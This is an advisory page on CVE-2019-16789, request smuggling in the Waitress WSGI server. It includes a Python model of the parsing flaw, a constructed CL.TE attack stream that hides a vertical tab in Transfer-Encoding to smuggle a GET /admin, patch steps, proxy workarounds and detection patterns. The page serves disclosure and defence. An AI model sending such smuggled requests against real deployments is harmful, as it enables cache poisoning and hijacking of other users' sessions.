CVE-2019-16789

7.1 HIGH

📋 TL;DR

CVE-2019-16789 is an HTTP request smuggling vulnerability in the Waitress WSGI server, versions through 1.4.0. A Transfer-Encoding header whose value carries whitespace characters that RFC 7230 does not permit in a field value (for example a vertical tab before "chunked") is still recognised by Waitress as "chunked", while a front-end proxy treats that header as invalid and frames the body by Content-Length instead. The two sides therefore disagree on where one request ends and the next begins (a CL.TE desync), so an attacker can smuggle a second request to Waitress inside the body of the first. The issue only matters for deployments that run Waitress behind a proxy that keeps backend connections open or pipelines requests over them.
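To make the disagreement concrete, here is an added Python model of the three framing policies involved; it was written for this page and is not Waitress's or any proxy's own code. It parses one pipelined byte stream (constructed below, with invented hostnames and paths) first as a front end that frames by Content-Length because it does not accept a value with a vertical tab in it as "chunked", then as a backend that strips vertical tab and form feed the way Python's bytes.strip() does and so frames by chunked encoding, and finally under RFC 7230 field-value validation of the kind the 1.4.1 fix adds.

```python
"""Model of the parsing discrepancy behind CVE-2019-16789 (constructed example).

Policies applied to the same pipelined byte stream:
  "lenient" - strips Python-style whitespace (including VT 0x0b and FF 0x0c) from
              header values, so a VT followed by "chunked" is read as "chunked" and the
              body is framed by Transfer-Encoding (the behaviour described for <= 1.4.0)
  "proxy"   - trims SP/HTAB only, does not recognise the value as chunked, and so
              frames the body by Content-Length
  "strict"  - rejects any field value with bytes outside RFC 7230 field-content
              (the kind of validation the 1.4.1 fix adds; not Waitress's actual code)
"""


class BadRequest(Exception):
    """Raised when a policy refuses to parse the request at all (HTTP 400)."""


def field_value_ok(value: bytes) -> bool:
    """RFC 7230 field-content: VCHAR (0x21-0x7e), obs-text (0x80-0xff), SP and HTAB."""
    return all(b in (0x09, 0x20) or 0x21 <= b <= 0x7E or b >= 0x80 for b in value)


def normalise(value: bytes, mode: str) -> bytes:
    """Apply one policy's whitespace handling to a raw header value."""
    if mode == "lenient":
        return value.strip()           # bytes.strip() also removes \x0b and \x0c
    value = value.strip(b" \t")        # RFC 7230 optional whitespace is SP/HTAB only
    if mode == "strict" and not field_value_ok(value):
        raise BadRequest("invalid character in header value: %r" % value)
    return value


def read_chunked(data: bytes):
    """Consume a chunked body (no trailers expected); return (body, remaining bytes)."""
    body = b""
    while True:
        size_line, _, data = data.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            _, _, data = data.partition(b"\r\n")   # CRLF ending the empty trailer section
            return body, data
        body += data[:size]
        data = data[size + 2:]                     # skip chunk data plus its CRLF


def read_requests(raw: bytes, mode: str):
    """Split a pipelined buffer into (method, target, body) triples under one policy."""
    requests = []
    while raw:
        head, sep, raw = raw.partition(b"\r\n\r\n")
        if not sep:
            raise BadRequest("incomplete header block")
        lines = head.split(b"\r\n")
        method, target, _version = lines[0].split(b" ", 2)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = normalise(value, mode)
        te = headers.get(b"transfer-encoding")
        if te is not None and te.lower() == b"chunked":
            body, raw = read_chunked(raw)          # Transfer-Encoding wins over Content-Length
        elif b"content-length" in headers:
            length = int(headers[b"content-length"])
            body, raw = raw[:length], raw[length:]
        else:
            body = b""
        requests.append((method.decode(), target.decode(), body))
    return requests


def is_rejected(raw: bytes, mode: str) -> bool:
    """True if the policy answers the stream with a 400 instead of parsing it."""
    try:
        read_requests(raw, mode)
    except BadRequest:
        return True
    return False


# Constructed attack stream: Content-Length covers the whole body (what the proxy sees),
# while a chunked reading ends the body at "0\r\n\r\n" and treats the rest as a new request.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: app.internal\r\n\r\n"
BODY = b"0\r\n\r\n" + SMUGGLED
ATTACK = b"".join([
    b"POST /login HTTP/1.1\r\n",
    b"Host: app.internal\r\n",
    b"Content-Length: %d\r\n" % len(BODY),
    b"Transfer-Encoding:\x0bchunked\r\n",       # vertical tab (0x0b) before "chunked"
    b"\r\n",
    BODY,
])

if __name__ == "__main__":
    for mode in ("proxy", "lenient", "strict"):
        try:
            print(mode, [(m, t, len(b)) for m, t, b in read_requests(ATTACK, mode)])
        except BadRequest as exc:
            print(mode, "400 Bad Request:", exc)
```

Run as a script, the "proxy" policy reports one POST carrying the whole body, the "lenient" policy reports the POST with an empty body followed by a separate GET /admin that the proxy never saw as a request, and the "strict" policy refuses the stream outright. That second, proxy-invisible request is the smuggling primitive; what it can do then depends on what the front end caches or which client connection it is answered on.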

💻 Affected Systems

Products:
  • Waitress
Versions: All versions through 1.4.0
Operating Systems: All platforms running Waitress
Default Config Vulnerable: ⚠️ Yes
Notes: Exploitable only when Waitress sits behind a front-end proxy that reuses (keeps alive or pipelines) its backend connection and forwards the malformed header. A standalone Waitress instance with no proxy has nothing to desynchronise against, so it is not exposed to smuggling, although its header parsing is still lenient until 1.4.1.

📦 What is this software?

Waitress is a production-quality, pure-Python WSGI server maintained by the Pylons Project. It is commonly deployed as the application server behind nginx or Apache for Pyramid, Flask and other WSGI applications, which is exactly the proxy-in-front topology this vulnerability needs.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Cache poisoning or smuggled requests answered on other users' connections, leading to credential theft, session hijacking, or injection of attacker-controlled content served to other users

🟠

Likely Case

Information disclosure through request splitting (another user's request or response attached to the attacker's), with cache poisoning possible where the front end caches responses

🟢

If Mitigated

Limited impact once the front end rejects malformed Transfer-Encoding values or does not reuse backend connections, since the parsing difference can then no longer be turned into a desync

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: MEDIUM

Exploitation requires a front end that both forwards the malformed Transfer-Encoding header and reuses or pipelines its backend connection; given that, the technique is standard CL.TE request smuggling and needs no authentication.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Waitress 1.4.1 and later

Vendor Advisory: https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes

Restart Required: Yes

Instructions:

1. Upgrade Waitress: pip install 'waitress>=1.4.1' (quote the specifier so the shell does not treat > as an output redirect)
2. Restart every process that serves through Waitress; the fixed parser is only loaded at process start
3. Confirm the installed version with pip show waitress, run from the same interpreter or virtualenv that serves the application

🔧 Temporary Workarounds

Disable HTTP Pipelining

all

Configure front-end proxy servers so that each client request gets its own backend connection to Waitress; without connection reuse there is no second request on the wire for the smuggled bytes to attach to.

# nginx: keep the default HTTP/1.0 to the backend and make sure the upstream block has no "keepalive" directive
proxy_http_version 1.0;
# Apache httpd (mod_proxy): disable keep-alive on the backend connection
SetEnv proxy-nokeepalive 1

Strict Header Validation

linux

Configure proxy servers to reject requests whose Transfer-Encoding value contains characters that RFC 7230 does not allow in a field value. The characters that matter in practice are vertical tab (0x0b) and form feed (0x0c), which Python's strip() removes but which a proxy will not treat as part of a valid token; bare CR or LF cannot normally survive header parsing at all.

# Example nginx location block (a request-level check; rejecting with 400 is safe to do inside "if"):
if ($http_transfer_encoding ~* "[\t\n\r\f\v]") { return 400; }

🧯 If You Can't Patch

  • Deploy a WAF or reverse proxy with strict HTTP header validation in front of Waitress
  • Monitor for unusual HTTP request patterns and implement rate limiting

🔍 How to Verify

Check if Vulnerable:

Check the installed Waitress version with pip show waitress (or the importlib.metadata one-liner below). Any version up to and including 1.4.0 is vulnerable. Run the check with the interpreter or virtualenv that actually serves the application; a system-wide pip may report a different package than the one your service imports.

Check Version:

pip show waitress || python -c "from importlib.metadata import version; print(version('waitress'))"

Verify Fix Applied:

Confirm the version is 1.4.1 or later, then send a request directly to the Waitress port (not through the proxy) that combines a Content-Length with a Transfer-Encoding value containing a vertical tab before "chunked". A fixed server rejects it with 400 Bad Request; a vulnerable one treats the body as chunked and processes whatever follows the terminating chunk as a second request.

📡 Detection & Monitoring

Log Indicators:

  • Multiple requests from single connection with malformed Transfer-Encoding headers
  • Unexpected 400/500 errors from Waitress with unusual header patterns

Network Indicators:

  • HTTP requests whose Transfer-Encoding value contains control whitespace, in practice vertical tab (0x0b) or form feed (0x0c), around the "chunked" token
  • Request splitting patterns in HTTP traffic

SIEM Query:

source="waitress.log" AND ("Transfer-Encoding" AND ("\t" OR "\n" OR "\r" OR "\f" OR "\v"))

The source name and the escape syntax for control characters depend on your SIEM and on whether the proxy or Waitress writes raw header values to its log; adjust both before relying on the query.

🔗 References

  • Waitress security fixes (vendor): https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2019-16789